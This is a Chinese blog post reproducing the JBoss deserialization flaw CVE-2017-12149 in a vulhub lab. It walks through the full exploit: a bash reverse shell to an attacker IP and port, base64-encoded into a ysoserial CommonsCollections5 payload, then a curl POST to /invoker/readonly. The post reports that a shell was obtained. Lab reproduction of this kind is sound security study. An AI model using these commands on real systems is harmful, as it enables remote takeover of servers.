vulhub-jboss-CVE-2017-12149漏洞复现

最新推荐文章于 2024-05-07 09:08:52 发布
最新推荐文章于 2024-05-07 09:08:52 发布
阅读量1.3k 收藏 7
点赞数
分类专栏: 漏洞复现 文章标签: 安全 java 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62008601/article/details/126917668
版权

漏洞产生原理

该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。

什么是jboss

Jboss是一个基于J2EE的开放源代码的应用服务器。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3的规范。 Jboss属于redhat公司,而且jboss是开源的,免费的,且在J2EE应用服务器领域,JBoss是发展最为迅速的应用服务器,所以曾经广为流行。
 

该漏洞出现在/invoker/readonly请求中,服务器将用户提交的POST内容进行了Java反序列化:(该图像来源于vulhub官方wp中)

启动环境之后,直接在浏览器中进行访问

显示该页面说明环境是搭建成功的。接下来访问他的invoker/readonly目录,

访问正常。然后通过反弹shell的对该漏洞进行利用。

我们使用bash来反弹shell,但由于Runtime.getRuntime().exec()中不能使用管道符等bash需要的方法,所以需要对弹shell命令bash -i >& /dev/tcp/192.168.217.139/4444 0>&1进行base64编码。接着我们使用 ysoserial 工具来复现生成序列化数据,并重定向到exp.ser文件

java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIxNy4xMzkvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}" >exp.ser

执行完该指令会生成一个exp.ser文件,接着我们可以使用curl命令,将我们的序列化数据以POST的形式发送。

 curl http://192.168.217.134:8080/invoker/readonly --data-binary @exp.ser

在传文件之前,我们需在攻击机开启端口监听来接收反弹的shell

开启监听之后,开始向服务器发送请求文件。

 请求完毕,此时看到我们监听的端口,也成功反弹shell

 

7562ajj
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2017-12149 及修
weixin_46580614的博客
07-24 5500
CVE-2017-12149 及修 漏洞名称:JBOOS AS 6.X 反序列化漏洞 CVE编号:CVE-2017-12149 漏洞等级:高危 影响版本:5.x和6.x版本 漏洞描述及原理:2017年8月30日,厂商Redhat发布了一个JBOSSAS 5.x 的反序列化远程代码执行漏洞通告。该漏洞位于JBoss的HttpInvoker组件中的 ReadOnlyAccessFilter 过滤器中,其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致
Jboss CVE-2017-12149 漏洞(vulhub)
MDSEC的博客
08-24 261
CVE-2017-7504 漏洞与 CVE-2015-7501 的漏洞原理相似,只是利用的路径稍微出了变化, CVE-2017-7504 出在 /jbossmq-httpil/HTTPServerILServlet 路径下。JBoss AS 4.x 及之前版本中, JbossMQ 实过程的 JMS over HTTP Invocation Layer 的HTTPServerILServlet.java 文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。
vulhub之jboss(CVE-2017-12149)
最新发布
weixin_56306210的博客
05-07 231
vulhub之jboss(CVE-2017-12149)
Jboss弱口令与远程部署漏洞(CVE-2017-12149)
hovcfuti的博客
10-13 137
Jboss 5.x/6.x admin-console和web-console的账号密码是一样的。因此当web-console无法部署war包时,可以使用admin-console来部署。前提是先得到账号密码,密码保存在jboss/server/default/conf/props/jmx-console-users.properties。弱口令登录,vulhub靶场里的用户名密码是admin--vulhub。点击Web Application (WAR)s部署war包。部署刚生成的sl.war。
Vulnhub 靶机实战系列:DC -3网站管理员账号密码和系统提权
weixin_50815573的博客
03-03 4485
Vulnhub 靶机实战系列:DC -3网站管理员账号密码和系统提权 搭建测试靶机 下载地址:DC: 3.2 ~ VulnHub 则靶机DC-3 ip:192.168.1.106(NAT连接) 攻击机kali linux ip:192.168.1.237 信息收集 使用:nmap -sP 192.168.0.0/24 进行扫描找到目标靶机 对目标靶机进行端口扫描 利用nmap对目标主机进行端口扫描,发开放端口:80 使用命令:nmap -A -p- -T4 192.168.1.106
渗透测试-JBoss 5.x/6.x反序列化漏洞
道阻且长,行则将至。
07-08 1710
漏洞概述 2017年8月30日,Redhat公司发布了一个JbossAS 5.x系统的远程代码执行严重漏洞通告,相应的漏洞编号为 CVE-2017-12149。近期有安全研究者发JbossAS 6.x也受该漏洞影响,攻击者可能利用此漏洞无需用户验证在系统上执行任意命令。 类型 描述 漏洞名称 JBOSSAS5.x/6.x反序列化命令执行漏洞 威胁类型 远程命令执行 威胁等级 高 漏洞ID CVE-2017-12149 受影响系统及应用版本 Jboss AS 5.x、Jbos
vulhub漏洞79_Jboss
weixin_44193247的博客
02-16 1613
vulhub漏洞练习篇
利用Vulnhub漏洞 - JBoss JMXInvokerServlet 反序列化漏洞
qq_50854662的博客
09-17 345
JBoss JMXInvokerServlet 反序列化漏洞 Vulnhub官方教程漏洞原理 过程启动环境端口设置浏览器设置BurpSuit设置 漏洞序列化数据生成发送POCEXP Vulnhub官方教程 https://vulhub.org/#/environments/jboss/JMXInvokerServlet-deserialization/ 漏洞原理 这是经典的JBoss反序列化漏洞,JBoss在/invoker/JMXInvo..
【内网渗透】vulnhub三个基础靶场wp
weixin_51614272的博客
09-15 2767
ssh、msf、webdav、linux、kali、basic_pentesting_1、Me-and-My-Girlfriend-1、narak
CVE-2017-12149JBOSSas6.X反序列化(反弹shell版)
08-08
CVE-2017-12149 JBOSS as 6.X反序列化(反弹shell版)
Jboss Application Server反序列化命令执行漏洞利用工具(CVE-2017-12149)
07-23
CVE-2017-12149漏洞利用工具,针对该漏洞快速方便的进行利用。
jboss-CVE-2017-12149
01-22
Jboss反序列化漏洞利用工具,CVE-2017-12149。Jboss反序列化漏洞利用工具,CVE-2017-12149。
CVE-2017-12149
03-01
CVE-2017-12149漏洞利用工具,有GUI界面,使用方便,和我的博客中的文章对应的工具,文章地址是https://blog.csdn.net/yougexiaojiuguan/article/details/136404381?spm=1001.2014.3001.5501,题目为vulhub中JBoss 5...
简单了解cms,vulhub中的wordpress漏洞
weixin_64655821的博客
09-12 1032
简单了解cms,vulhub中的wordpress漏洞
CVE-2017-12149(JBOSS反序列化远程代码执行漏洞漏洞
Jerry____的博客
12-12 3913
一:漏洞说明 JBOSS Application Server是一个基于J2EE的开放源代码的应用服务器,攻击者利用该漏洞无需用户验证在系统上执行任意命令,获得服务器的控制权。 二、影响的版本 5.x和6.x版本的JBOSSAS 三、环境搭建(目标机:192.168.33.144) 利用vulhub搭建环境 1、进入漏洞目录 cd /vulhub/jboss/CVE-2017-12149 2、搭...
vulhub漏洞-jboss反序列化漏洞
weixin_45095113的博客
12-21 633
vulhub漏洞-jboss反序列化漏洞
漏洞】Jboss反序列化漏洞(CVE-2017-12149)
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
08-17 819
JBOSS Application Server是一个基于J2EE的开放源代码的应用服务器。JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用CVE-2017-12149漏洞:该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter ,其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致攻击者可以通过精心设计的序列化数据来执行任意代码。............
CVE-2017-12149的
看不尽的尘埃——博客
11-19 870
漏洞名称:JBOOS AS 6.X 反序列化漏洞 CVE编号:CVE-2017-12149 漏洞等级:高危 影响版本:5.x和6.x版本 漏洞描述及原理:2017年8月30日,厂商Redhat发布了一个JBOSSAS 5.x 的反序列化远程代码执行漏洞通告。该漏洞位于JBoss的HttpInvoker组件中的 ReadOnlyAccessFilter 过滤器中,其doFilter方法在没...
CVE-2017-12149漏洞分析
05-30
CVE-2017-12149是JBOSS应用服务器中的一个远程代码执行漏洞。JBOSS是一款Java EE应用服务器,该漏洞允许攻击者通过HTTP请求发送恶意的序列化对象,从而在目标服务器上执行任意代码。 这个漏洞的原因在于JBOSS中的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值